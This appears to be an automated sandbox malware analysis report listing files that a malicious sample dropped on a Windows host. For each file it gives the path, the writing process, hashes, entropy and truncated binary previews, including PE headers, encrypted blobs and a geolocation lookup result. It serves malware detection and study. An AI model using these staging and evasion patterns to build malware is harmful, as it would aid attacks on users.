Joe Sandbox View:	Filename: c2.hta, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: RisingStrip.exe, Detection: malicious, Browse Filename: Active_Setup.exe, Detection: malicious, Browse Filename: CenteredDealing.exe, Detection: malicious, Browse Filename: CenteredDealing.exe, Detection: malicious, Browse Filename: over.ps1, Detection: malicious, Browse Filename: MatAugust.exe, Detection: malicious, Browse Filename: 6684V5n83w.exe, Detection: malicious, Browse Filename: vlid_acid.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s

Download File

Process:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
File Type:	data
Category:	dropped
Size (bytes):	733484
Entropy (8bit):	7.999727303580045
Encrypted:	true
SSDEEP:	12288:7EjETXeEPYtANOcxShg6LO5mrcPIez2EsXwEA0cIYJU9YoULsEpW2bhhbaIkJflE:7EE9Iln+6LcmoPIezgAv0JioULJpph93
MD5:	C82D57C04AAD2BD54DFEED7CBFEE8ECB
SHA1:	C564CFCA3BCC3A26128917C94AB4E44F9CD25BBE
SHA-256:	4E285732BD17A06AE4BE71BEAAD8E5CE4DBD211F2888B4571D5D0C716764C767
SHA-512:	9D3102EFB33D4B5A510D24D1B7F313C66CB502B6B7572EF2C10538D3B48B8D63D7CAD41E5B9596181B142A7FDFD27727C6541A55307B4C4F793B957ACD7ECEDB
Malicious:	false
Preview:	.....#.<....d.Dm{R..fR.@^..J"..H$.\|...H.[.....#W..br'..Y.$y.l...wFU..9..aQ8.r...e...H(..y..'...u/(..c.!$..x.\z..g.d.j.....xe.J><5...S=&....L.'.D\Nm..N.....k.L..b D.".<)\_.t.....4.s.6...o=.Y....c..!T.D..aI.0.x.vC.Q,.].I^...E.5....`..y...y..!.d7..n....FW.....IO..c.D..\|.-Q.C'.#.`.))..:..@~.j.L/9.Z~........0..:Q. %..).w%.l)...5%..l..7q.....F0.T..>GU..P.DA.]..f......BMv$.g2g<u.....O...../.0N...c..H.%........Q.....&@p...OE..R..:.g....p'.Y.+.^..............k.1..".S.....>.A.4^.....9..).=?`....]..:.nF.....Ty.k..t..lK..^.....:E...u-_.1&T<...p.._..a..u..{g....4..fF,.:%...../..T&.......hB;.......3'.<p".u..7.ju...c.f(pTp.I./...r,.X.....f...........I...E.'pji.d....B.N<..P..5p.q]...:.1Xj.:.>.E..J..l.Z.H!r'hJ....".(.S...`..AIe.b&B..p....#.. 6..2...#.....D.(.X.AZ...%8;b..~*K..d.ja0..n..jU8.G.8.u..3....h.g.LB...._".&{...ggaF..X.0..u]..#...g6+..GR.i.?..Y.( Lv..0.........1<..<...$.'......l.).....]....}(..(.q...fJp..9,....U...@....e..-....WJv]..C1u

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	5.019205124979377
Encrypted:	false
SSDEEP:	12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
MD5:	B62617530A8532F9AECAA939B6AB93BB
SHA1:	E4DE9E9838052597EB2A5B363654C737BA1E6A66
SHA-256:	508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
SHA-512:	A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
Malicious:	false
Preview:	{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	26604
Entropy (8bit):	5.0530691163715815
Encrypted:	false
SSDEEP:	768:SLbV3IpNBQkj2Uh4iUxkOZhxiardFuJ+OdBOtAHkvNZzNKe1MlYoaYP:SLbV3CNBQkj2Uh4iUxkOcqd8J+OdBOtW
MD5:	618CA8D25C8C3312608E689D44BE6D02
SHA1:	34070D4AECA3905C1846646EAD276E1DC915E828
SHA-256:	08FFCB482F70C42C270CB5AEB36C5B4F2A6D0B72B608C2678DDACB3EC09EE518
SHA-512:	ED77AA9441988D6B72D56D92B22DF75385A2E0D3B6EDF97DD00E45D8C7CE2071F58DE8C69C8076F57A0A45D8C0EAF392C8FF4DAC6D079431F1481AEDF7EEBABF
Malicious:	false
Preview:	PSMODULECACHE.(...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\677826\N

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	733484
Entropy (8bit):	7.999727303580045
Encrypted:	true
SSDEEP:	12288:7EjETXeEPYtANOcxShg6LO5mrcPIez2EsXwEA0cIYJU9YoULsEpW2bhhbaIkJflE:7EE9Iln+6LcmoPIezgAv0JioULJpph93
MD5:	C82D57C04AAD2BD54DFEED7CBFEE8ECB
SHA1:	C564CFCA3BCC3A26128917C94AB4E44F9CD25BBE
SHA-256:	4E285732BD17A06AE4BE71BEAAD8E5CE4DBD211F2888B4571D5D0C716764C767
SHA-512:	9D3102EFB33D4B5A510D24D1B7F313C66CB502B6B7572EF2C10538D3B48B8D63D7CAD41E5B9596181B142A7FDFD27727C6541A55307B4C4F793B957ACD7ECEDB
Malicious:	false
Preview:	.....#.<....d.Dm{R..fR.@^..J"..H$.\|...H.[.....#W..br'..Y.$y.l...wFU..9..aQ8.r...e...H(..y..'...u/(..c.!$..x.\z..g.d.j.....xe.J><5...S=&....L.'.D\Nm..N.....k.L..b D.".<)\_.t.....4.s.6...o=.Y....c..!T.D..aI.0.x.vC.Q,.].I^...E.5....`..y...y..!.d7..n....FW.....IO..c.D..\|.-Q.C'.#.`.))..:..@~.j.L/9.Z~........0..:Q. %..).w%.l)...5%..l..7q.....F0.T..>GU..P.DA.]..f......BMv$.g2g<u.....O...../.0N...c..H.%........Q.....&@p...OE..R..:.g....p'.Y.+.^..............k.1..".S.....>.A.4^.....9..).=?`....]..:.nF.....Ty.k..t..lK..^.....:E...u-_.1&T<...p.._..a..u..{g....4..fF,.:%...../..T&.......hB;.......3'.<p".u..7.ju...c.f(pTp.I./...r,.X.....f...........I...E.'pji.d....B.N<..P..5p.q]...:.1Xj.:.>.E..J..l.Z.H!r'hJ....".(.S...`..AIe.b&B..p....#.. 6..2...#.....D.(.X.AZ...%8;b..~*K..d.ja0..n..jU8.G.8.u..3....h.g.LB...._".&{...ggaF..X.0..u]..#...g6+..GR.i.?..Y.( Lv..0.........1<..<...$.'......l.).....]....}(..(.q...fJp..9,....U...@....e..-....WJv]..C1u

C:\Users\user\AppData\Local\Temp\677826\Prostores.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Alcohol

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	6.704539217194939
Encrypted:	false
SSDEEP:	768:9pQLiype/ehju5rWiq/DOSOlwRDNFoDu+XdoXSMf17+sVXnQkdFLILu8rbPDmhdu:9eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CK
MD5:	DD266093B6C3933B83753002FA856A2E
SHA1:	39D54DC7D7DC9A7C7DD626046096730E730C22D4
SHA-256:	5FD8ED3BCC118A3E4DA9669B07497F3933245FDF4451276394858022E8F867BB
SHA-512:	A6CAB1788FBCE3DC329F84B2CFE034D67CE909A0DCF871F22E51AD11E17A26201F894280568FA46C2DCFFA74CD6E9BE4287201617288A1C171DEDF52F370B7C5
Malicious:	false
Preview:	..x.........} .......0f......Q.u..u.j..p.......]..M ..`+J................}.3.VS.].WS.u.ja.u..X........u.............P...WSh.&J..:...V.u.WS.u.jb.u..".....(..t.WSh.&J......V.u.WS.u.je.u........(..t.WSh.&J......V.u.WS.u.jT.u........(....z...WSh.&J......V.u.WS.u.jY.u.......(....j....K...S.u.3....u.....u.P.u............&....u..u.h.&J..l...S.u..u..u.j..u.......$.E..H...xC....>.u..E..u........./............E..H...x.......u..E..u.......................!..2......E..H....\|.....} ......$ f....P.u..u.j.Q.D....u..u.h.&J..\|.....w..b...t...p......H...tZH...tD...u..E..H.....w........n.....u.f..uu.j.Y.} ......$0f....P.u..u.j...u..u.h.&J.......u..u V..`+J........}..].WS.u.jI.u.................WSh.&J.......u VWS.u.jM.u........(........WSh.&J.......u VWS.u.jS.u.......(...._...WSh.&J......u VWS.u.jp......u..u..u.jX.u..............E..@.....j........a.......E.....L.......P....u..u.P.......x....................4.......E.3.P.u.....Y.........E.9p t .E..u.P...Y.........M..M..M....M....3.+.j<^.

C:\Users\user\AppData\Local\Temp\Charged

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	92160
Entropy (8bit):	7.998070494541723
Encrypted:	true
SSDEEP:	1536:164/pznuZpMquK4j4dDY6M6Kio9mtkSE5U7rHuBEeiXzqLd/R9+1V4Lm2etN0:84B6pMquTQY6M9iAtSEfBrieLd59+MLj
MD5:	21A1CAF7906CD79FA2F0C1CCB065C02F
SHA1:	35D20FB034F3587773695FBE05FB0984BE7CC12C
SHA-256:	0817E365A8A9BD66F18EBC955AF76D00EA70071573952988E9701F5944B12EC8
SHA-512:	4952E631E2B98F19CD4952F8F4CA7B422025E6111678A3AEE94197FD7E7B2F6DA5C8761CE9A9F2EC909F184B9172275C11A21CB430B6D90171115005D5733E59
Malicious:	false
Preview:	.....#.<....d.Dm{R..fR.@^..J"..H$.\|...H.[.....#W..br'..Y.$y.l...wFU..9..aQ8.r...e...H(..y..'...u/(..c.!$..x.\z..g.d.j.....xe.J><5...S=&....L.'.D\Nm..N.....k.L..b D.".<)\_.t.....4.s.6...o=.Y....c..!T.D..aI.0.x.vC.Q,.].I^...E.5....`..y...y..!.d7..n....FW.....IO..c.D..\|.-Q.C'.#.`.))..:..@~.j.L/9.Z~........0..:Q. %..).w%.l)...5%..l..7q.....F0.T..>GU..P.DA.]..f......BMv$.g2g<u.....O...../.0N...c..H.%........Q.....&@p...OE..R..:.g....p'.Y.+.^..............k.1..".S.....>.A.4^.....9..).=?`....]..:.nF.....Ty.k..t..lK..^.....:E...u-_.1&T<...p.._..a..u..{g....4..fF,.:%...../..T&.......hB;.......3'.<p".u..7.ju...c.f(pTp.I./...r,.X.....f...........I...E.'pji.d....B.N<..P..5p.q]...:.1Xj.:.>.E..J..l.Z.H!r'hJ....".(.S...`..AIe.b&B..p....#.. 6..2...#.....D.(.X.AZ...%8;b..~*K..d.ja0..n..jU8.G.8.u..3....h.g.LB...._".&{...ggaF..X.0..u]..#...g6+..GR.i.?..Y.( Lv..0.........1<..<...$.'......l.).....]....}(..(.q...fJp..9,....U...@....e..-....WJv]..C1u

C:\Users\user\AppData\Local\Temp\Chief

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	138240
Entropy (8bit):	5.980191824734651
Encrypted:	false
SSDEEP:	3072:Y0ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsPI:YV14ZgP0JaAOz04phdyQ
MD5:	5D7F155185B7B7CE52433DF0895CD254
SHA1:	3DCF933C6895B843DBA20447C21F673F83EAFA9D
SHA-256:	EEA2D5CFCF7311B8E926741CA23552D11D43049753BBB2EFD835A6E7CA9FB396
SHA-512:	29A0603A0AF8E8E0D9A8E8A414D91EDCBF6E5236D8F4A1496EC84DB26DCEC2CFCAE133BB33AE87CCBB6442F54ABFE8CA450CF65515EC587BF551B583828A3318
Malicious:	false
Preview:	t.P.e........u..'.....2._^]....y,.t..A0.I,V.0.....%T5M....^.y..u%.=L*M..u..T5M...d}.@.T5M.j...j...\|.I.3..U..}..t..u...(M..W......L)M.....L)M....u.3..-.@)M.Wj.......8W..\.I..M.j.W....\.I..M._..3.@]...U..)M....VW.}..E...t7..99t..@...M..y..u..E...)M.P......P.....;.tGQ....9...=.u..~..u.3..3.M..~:...E.}.;.t.V....9...E.)M.P.;....M..{8..3.@_^....U..}..t..u...(M..c......L)M.....L)M....tY.@)M.V....0.F...t.9..)M.u....)M...F.P..<.I..f...}..t#.u..u...@.I..F...4.I.9.u..L)M...)M.^]...U..}..t..u...(M........L)M.....L)M....u.3..-.@)M.......E..AX.E..A\.E...~..A`.E...~..Ad3.@]...U..}..t..u...(M..{......L)M.....L)M....t$.@)M.j.j.j ......E..1.A..E..A.....I.]...U..}..t..u...(M..(......L)M.....L)M....u.3..h.@)M..E.....L.V.....0....D{....L..8....F\|....E....t........E....t........Nl;M.t..u...7...E.......3.@^]...U..Q.}..t..u...(M.......L)M.....L)M.VW..........@)M.j.....0..P.E...\.I..}......#.+.....@.E....t.Wj..u...@.I...tb.}..t..u.j..u...@.I...tJ.~8.t?.....3.#.;....9E.t.j.;.u...L.I..FH

C:\Users\user\AppData\Local\Temp\Controversy

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	7.996221667590853
Encrypted:	true
SSDEEP:	1536:5vS3nn2ZA7/kkNlk59NouS6HSV4y7ugw7wU140:5vSGZAzkkjkPNxS6HSGaugwz
MD5:	9AB6CC30C12CEB5D4F1BB3A55D4FE455
SHA1:	74C250C42E24E6DF717B49A4BED3729EB9064CAD
SHA-256:	3A83E692C74855B6DC24C7067D4308031310A678E4C57EF45E7D3EC9256844A1
SHA-512:	C96341AFA3630FA9212FF91D860CBFD37D135C52386A316C3B161BC0DF307486D4BF19FB7023532AE26380643F010BD7427BA5AB3768EE3E3F6D4BDD09921144
Malicious:	false
Preview:	.C\|,..X@`.C(r...E...q.[$.t.'.:..j...-....`./].....KD. .G+..... VP&.G.\..AH....^............f...M...&.......EAU........,.3A..e.....r...k.4..{.o..K.7}.".....[.Dq0Gu.. w..&.Q.bpF..._2..bt.DJ.cc....f^.?.O...pL.s^..-d.......\|..v.......T.:.....J-0........qB.%.........j...sr.n.+.j........n.....V..~..&.....i..w5}..u....F.......5d....rT.......;..)Omq........s.gIt..H..g.j/.......<..........T.)..B.&.....<..;KG.R....:s._.v.07..Vl.&:..Y.%...'.ljnw.t.`Vq..qE.b5J. 0.. .B .].A..n. ].7..{........x.?<.'.fX...:....m.......n.+ .kr....&{.M...`..a,X=;..:6Z.......3}...V.3...,..h..1d.....K..N<~.... .9...xHnF...X9...!...=.'V.Auy. ...e.........!..U..R...L../.....l#..o..:m7_gC.e....e.@...X...V.NCK..\|..3..zER):.pt....M...!r_I...(...D./.V.U.i.7..I.I...[P..s...9..~)..UK5.}e.~..%.q..@,...._...$>..H...J..Dpj.1.........!...<.q...._*..C.\...V..o.......`%l.>&._`9.Y.......m.R..E.?.(.J%Oy.....3. ..P.z7..[v..z...h.....qiM.! .vo..9...zb....h........@.&..

C:\Users\user\AppData\Local\Temp\Corporate

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	6.581173789840171
Encrypted:	false
SSDEEP:	1536:A6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfT+:AypIbv18mLthfhnueoMmOqDoioO5bLeF
MD5:	459740D3AA55D6BB677047A043A11049
SHA1:	20002F1D45FEA6EED6AFF3EAD22CFF091D78B41A
SHA-256:	4C4F6EF591CDD3D235FE09DF1A90CD5AF14C756A908BE132C13A9EDE2B7A900D
SHA-512:	B51D14C8DA04FFF2ED8D309B643A91F679BF2A31638B8E91B7DE9BB7CFE7F3AA8590432B685621B871A004DE2D8AEAFC0CCF057AE5F55BCB0661C7172105CB34
Malicious:	false
Preview:	...N........t$...........j.W.t$ ...t$(.C%.............C..0......N........L$........n..._^3.[..]...U..E.V.@..0...~....F.... .....u..u....F....&..F.....3.^]...U...TSV.5,.I.3.Wh....S....h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...E.E.P.E.........I...uN.u....S......3.B.V....H..D9.8\9.t..@8.P..D9.8\9.t..@8.X...0.I.SP...H.....q.....E..t.;D..t.C...~..u....~............F......._^3.[....U... SVW.E...P....I...4.I.P.E.P.......@....E..}.)E..E.)E.....u`.M...t..3..j.CSV.Rz...M..E.3..M.WSPV.}.]..(.......M..]....E.S.E..E.SPV.}.]..........M..:....~.G....?.....u....H..\|1...D1.t..@8.@......\|1...D1.t..@8.@...B......u..u...}.......F......!.G........3.C;.u..u...}......^..>_^3.[....U..V.u....W...~..u..F..H.....V.j.P.J..2.p...P...h...P....".._3.^]...U..E.V.@..0...x....F....L.....u..u....@....&..F.....3.^]...U..Q.E.SVW3..M.G.x..r..@..H..........~O.E.3..~F.@..0........F

C:\Users\user\AppData\Local\Temp\Dealer

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	52224
Entropy (8bit):	7.996119878250014
Encrypted:	true
SSDEEP:	768:U/Q+dzD31O3KAFDxDE5twt8C4wDBEZNBclMWOWQUvjBziwpfHS28mILe3VBGranP:U/Q+5MJFlMVCPGNelMUjtzpfl8HdCCS
MD5:	9C9C85945089A8C81528A6B23A209E20
SHA1:	599E249D010D0A40F3914D82AF710C655A1DA778
SHA-256:	71E8E4C78A2238179F1D01D2C280CAF8CCA1B62379C51FCEA39FAB2800990D5C
SHA-512:	26159EF952317A38560F91D10CCF89F9C652CFEFC73A15681F3554F36AE53326322ABB3466900466DBD0868971DF7A9D1C2D718FACFE87BECD13B7390438E9F0
Malicious:	false
Preview:	......CC...m..Y..#. .=..C.r.t...I$.#...l.7.-_..E8 ..x9....k.V9.'."..1...D".?.3z\|...\.. v...S.(..n.`)=/...cVF..S...gd`.Zs\|=... .%.X59.MW.]....Nk....fSN.f.F..uB..`.CE...].j#.....P?cl.<...0.2.!..t!...C.V..8O.7W...yqpy.v...#{dW.E......fm.+.W.b.OOm....{,.~....m.e.......HX.....M.c..c%.eb...O..U..._....n..v....=T..^.K...b.0.M_..F(......C...S..^...R\|....D..4...H~.9t;..^.4..3..n......V;\|.&M.s...yc...pls...R.`.`L..s..Vm.]...Q...w.<..1p......~8..^e.U...6...$....k....`.:E.{,......s..G~.W`c...\........A.P.^.......i..P)..N.&p.N.,.....#<}.w..j).c1....c.......;[.......,S.....d-R......Y.._J.1..h......{nRh.j..Q.......... _......_C.t.1...........T...h.`...e.....4.6<r.z[.Q..W ?X5.pHeg..RA.m7.:....5.NnPC.N],.s_.n..$.y.eL.S>..c.W.&o\|.Q.u.;..jb.l.Y.]...NY.!.!{?.........E.......+.x.W.X.)q.........(.y....'.>..........;."8..S.C...s.Oys....d.m)..m...su.\|...9..W=.....n...?.rBqV.&..`'../........Xt....t.wc..U......H.C...}.E..TFk.[.3.Te.X....}1...{.[.n.V.. {.Rwt..Y.....

C:\Users\user\AppData\Local\Temp\Fig

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	7.996893434432179
Encrypted:	true
SSDEEP:	1536:Af058ph2Px8y8B71tsH84JDXInbJUYQkOy8n20NaupzF:Ae62my8Z1gLDXInbhQkOyA208upzF
MD5:	C7C08C021E27B2EEB0824937A10AC43D
SHA1:	3FFEC4974BCCF5A2CB9AD02411DBAD5B62F810A1
SHA-256:	4F6A15C2BC947318BA8BCCF9BE0948BCCB6740D1F06CCD5ECF9296609166E524
SHA-512:	0B539D2800C0FF28841F478368838B12CEE02019145275432CC7FD9767BCED34F444D1C77C50804DA36E00942FB19AC0AC65C73918D7F2E96EF77EBA28387D14
Malicious:	false
Preview:	Y..y.Y.X..(..C..m.pP..1.W.6.Xc.sI......daE..Z.y.>.U!....-...LX.vgm._U....{XU..!T..&..j:&...........!W..^Lh.[..}..........-.o.\|2=#..c...~.I..\|K.<Uj.z0..(.KZ.e......%~GL...E..j..M..L..2.KC.....(7.E.v!...".....(IW)..T.w.... ..Uk..^:.Tx/f..$oY.)N)..:LW].g.>...g.....(...(C.<f...6..`D.r..../w.-..I...0..=........S....d.0...W{.....RB...R.g..z....TM.dM:m....P...!3.;.i.!W.~.e.'........u...a...ajF.[M.Oj}..4...n.r..q].xT.6...{.I..)`....jiJ..2.U`......{..}..........X.U.md..,.U .9\|W.=.V.1Yx..,..%....t.8...G..G..D..O..S{.;oq<,xW...p,.B.....F..$MR....@"/...D.^....b..)^[.AI......b....(zn8.1.X5..'...\|.1j..=''XD...Yumt..Of..b>.....O"Of~..x..3j..'eW.V....K.LB ...i..R...u......KN.#...pf).....p.Q..D=g......:......r..[.f.n.....D-#?...g..3....;%.y5kL...8s.....J/.......#.oY$..^Z.@B.[...V.B..B[s.a.Y.).q.".O.......u...&...<{..r.1J...'G.2....MFN...'.1.C..3!...b..^...d..........>q....x..W...LH.{..G.v..l.&\|o.Z.T.un.K....E^......C.6.xcu...@.#u....*.f..Y.....1.

C:\Users\user\AppData\Local\Temp\Hearings

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	117760
Entropy (8bit):	6.296704167940761
Encrypted:	false
SSDEEP:	3072:SZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laWq:SK5vPeDkjGgQaE/lM
MD5:	1D1169E8E8C0DE7A5E7E1BABD8470DD6
SHA1:	4406EB665FC118B1767464F0CE2484C97EB4880B
SHA-256:	F20431C1D82AB151DDE7271CD37A6F208FCD45272D9A83980CCC3DD72D704F40
SHA-512:	4E7562F6102F1265BF5C64509ADC68769680110BFDD2333C977A3404CEA3D014960EF1BE276BFF241761C9E5135711D2DBA53980E5BB6EA83375E1951ECCD351
Malicious:	false
Preview:	MechanicalDlModularRuSchedulingVisibilityProposalsClimb..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.......................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Larger

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	146432
Entropy (8bit):	6.6465980351029454
Encrypted:	false
SSDEEP:	3072:DtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVno:BNPj0nEo3tb2j6AUkB0CThp6vmVno
MD5:	39C723A69E6F51230D209B72F81ABE9B
SHA1:	B0F058579D60E5A6C612F60732FDF3D7C8E86A9C
SHA-256:	4A1B5FF59395FC0991987B588918649871A3106340A3D6F572C3FA232D59FBC9
SHA-512:	04858B44C1DB4B307F0FB2C853FFB0C1149A23166C670AAA407D191AB47CE21702858D4B30AABDDEC253652868E19B1A01ACF1E2A5AB776581E191CA38F8806B
Malicious:	false
Preview:	.E................E...6........E............E............E...........jR.d...f;.r.j0..[j9Xf;.w..r..u........f;.s.j=.9j:.5j..1j9.-.E...T....Qj0..j*..j>...u.j...j..E.Y...!...j..E.Y...'..........G.........E..........E...4....E..03..v............U...............E..E..P.E.P.M.....YY........~..u..U...@.K..M.P.u..u.......T.U..M.;.r%;.v.;.v/.G.;.w(...}.;.v......;.w....F.;.r..u....Q.M.R.u..U..u..........E..e...;...@......+.@.E..E..@....8.E................U.G...;.v.}..E..M...........;..........}.......]....t1;.s.j.Xf.............B..u=3...@f...........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2..........F..4F...f;.t........M...F..I...A.E...U..H...t4;H s#..+P.........;........E....;H r.U.3.f9C.......jwY..B...Bf9.t.;.r.;........M.....t.9X.t.....u..........M..].U..E.P.u....u..U......jw....g.....C...CXf9.t..T.....N......Q........E..$...E.3.f9D....,....).....F.f;.t.j.Yf;...j.Zf;.................F.j.Zf;.t...}........f.F......f#.....f;...f.F......f#......f;...............}...

C:\Users\user\AppData\Local\Temp\Lets

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	7.997921805668066
Encrypted:	true
SSDEEP:	1536:4y+7CHT4k9YRtUo7NA2lVU2vBK8D3DhHMl+BAD1g:4iHTb9YRtU8RrU2vsgDtz61g
MD5:	FA2010085679EEC632F3107657E30A81
SHA1:	74611BE98EA26266232DD5A92F465D09273F76F6
SHA-256:	B449025FE3C3A0598C9D9BCF2D8C631FBA1B3C4144237D78FE6ECDD1574E2211
SHA-512:	5D2346B043F37469BE69690DA25B4257D8554A24B48214DC91E5957971184E56DB49AECD1CD2379D27BA0E31E1F31BEF07D974066AD5C92B95CAA16811126CA5
Malicious:	false
